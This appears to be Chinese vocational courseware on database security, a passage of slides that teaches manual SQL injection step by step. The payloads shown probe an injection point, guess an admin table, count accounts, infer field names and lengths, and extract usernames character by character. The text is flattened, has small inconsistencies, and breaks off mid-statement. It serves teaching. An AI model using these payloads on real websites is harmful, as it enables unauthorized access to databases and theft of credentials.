學(xué)習(xí)目標(biāo)：知識(shí)目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠熟練配置數(shù)據(jù)庫(kù)能夠掌握注入攻擊的特征能夠靈活判斷數(shù)據(jù)庫(kù)的各種狀態(tài)能解決配置過(guò)程中出現(xiàn)的問(wèn)題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問(wèn)、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣能與組員精誠(chéng)合作，能正確面對(duì)他人的成功或失敗具有一定自學(xué)能力，分析問(wèn)題、解決問(wèn)題能力和創(chuàng)新的能力了解數(shù)據(jù)庫(kù)的基本知識(shí)了解數(shù)據(jù)庫(kù)安全防護(hù)的必要性掌握注入式攻擊的原理掌握數(shù)據(jù)庫(kù)系統(tǒng)安全策略8.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營(yíng)一段時(shí)間后，服務(wù)器都增加了大量的資料和數(shù)據(jù)。這些數(shù)據(jù)統(tǒng)一由數(shù)據(jù)庫(kù)軟件進(jìn)行管理。但是新天教育部門主管擔(dān)心這些數(shù)據(jù)容易受到外部攻擊，特別是通過(guò)數(shù)據(jù)庫(kù)進(jìn)行攻擊。為此，新天教育培訓(xùn)集團(tuán)需要有效的安全防護(hù)手段。唐宇經(jīng)過(guò)憑借所學(xué)的知識(shí)他馬上想到了要滿足以上要求需要針對(duì)數(shù)據(jù)庫(kù)進(jìn)行安全配置。8.2情境描述配置的流程怎樣？什么是手工注入？手工注入的應(yīng)用場(chǎng)合？手工注入語(yǔ)句構(gòu)造？12348.3任務(wù)分析任務(wù)8-2SQL注入攻擊 手工注入，遵循SQL語(yǔ)句規(guī)則，構(gòu)建特殊的輸入作為參數(shù)傳給Web應(yīng)用程序，通過(guò)執(zhí)行SQL語(yǔ)句進(jìn)而執(zhí)行攻擊者的操作。為了讓用戶了解不同數(shù)據(jù)庫(kù)（MySQL、Access、SqlServer、SQLite、MongoDB、Db2、PostgreSQL、Sybase、Oracle）的結(jié)構(gòu)，掌握利用工具運(yùn)行測(cè)試的原理，深刻明白SQL注入漏洞的形成根源，初接觸SQL注入或一般基礎(chǔ)者更適合于使用手工注入。注入過(guò)程：數(shù)據(jù)庫(kù)執(zhí)行的語(yǔ)句，是頁(yè)面提交至服務(wù)器應(yīng)用程序，應(yīng)用程序獲取id的值，然后把值拼接到查詢語(yǔ)句中，在到數(shù)據(jù)庫(kù)中查詢，通過(guò)程序解析后，把結(jié)果返回在頁(yè)面上。子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 通常情況下，手工注入構(gòu)造語(yǔ)句原理如下。步驟1：判斷有無(wú)注入點(diǎn)如查詢Table中id號(hào)為3的記錄，其SQL語(yǔ)句為select*fromTablewhereid=3。如果ID=3的記錄確實(shí)存在，則應(yīng)該返回正常的值；如果不存在，則返回錯(cuò)誤的提示信息。本查詢是利用了and邏輯結(jié)構(gòu)的運(yùn)行結(jié)果。當(dāng)and前后的條件都為真時(shí)結(jié)果為真，任何1個(gè)條件為假其運(yùn)行結(jié)果都為假。（1）and1=1其完整語(yǔ)句為select*fromTablewhereid=1and1=1，只要id=3的頁(yè)面確實(shí)存在，整個(gè)查詢結(jié)果就為真，會(huì)返回正常的頁(yè)面。（2）and1=2其完整語(yǔ)句為select*fromTablewhereid=1and1=2，不管id=3的頁(yè)面是不是存在，整個(gè)查詢結(jié)果都會(huì)為假，則頁(yè)面會(huì)出錯(cuò)。從上可知構(gòu)造的語(yǔ)句可以被正常執(zhí)行，可以注入。子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟2：猜解表名根據(jù)命名習(xí)慣，表的命名一般是adminadminuseruserpasspassword等等。and0<>(selectcount(*)from*)如判斷是否存在admin這張表就可以將前面的語(yǔ)句修改為and0<>(selectcount(*)fromadmin)，能正確執(zhí)行，就說(shuō)明存在admin表；如果不能執(zhí)行則換能想到的表名。子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟3：猜賬號(hào)數(shù)目如果遇到0<，1<返回錯(cuò)誤頁(yè)面，說(shuō)明帳號(hào)數(shù)目就是1個(gè)（1）and0<(selectcount(*)fromadmin)返回正確頁(yè)面，說(shuō)明存在賬號(hào)（2）and1<(selectcount(*)fromadmin)返回錯(cuò)誤頁(yè)面and1=(selectcount(*)fromadmin)正確，則說(shuō)明有1個(gè)賬號(hào)步驟4：猜解字段名稱在len()括號(hào)里面加上想到的字段名稱。and1=(selectcount(*)fromadminwherelen(*)>0)--and1=(selectcount(*)fromadminwherelen(用戶字段名稱name)>0)and1=(selectcount(*)fromadminwherelen(_blank>密碼字段名稱password)>0)子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟5：猜解各個(gè)字段的長(zhǎng)度猜解長(zhǎng)度就是把>0變換直到返回正確頁(yè)面為止。and1=(selectcount(*)fromadminwherelen(*)>0)and1=(selectcount(*)fromadminwherelen(name)>6)錯(cuò)誤and1=(selectcount(*)fromadminwherelen(name)>5)正確長(zhǎng)度是6and1=(selectcount(*)fromadminwherelen(name)=6)正確and1=(selectcount(*)fromadminwherelen(password)>11)正確and1=(selectcount(*)fromadminwherelen(password)>12)錯(cuò)誤長(zhǎng)度是12and1=(selectcount(*)fromadminwherelen(password)=12)正確子任務(wù)8-2-2SQL手工注入任務(wù)8-2SQL注入攻擊 步驟6：猜解字符and1=(selectcount(*)fromadminwhereleft(name,1)=a)---猜解用戶帳號(hào)的第一位and1=(selectcount(*)fromadminwhereleft(name,2)=ab)---猜解用戶帳號(hào)的第二位就這樣一次加一個(gè)字符這樣猜,猜到夠你剛才猜出來(lái)的多少位了就對(duì)了,帳號(hào)就算出來(lái)了and1=(selecttop1coun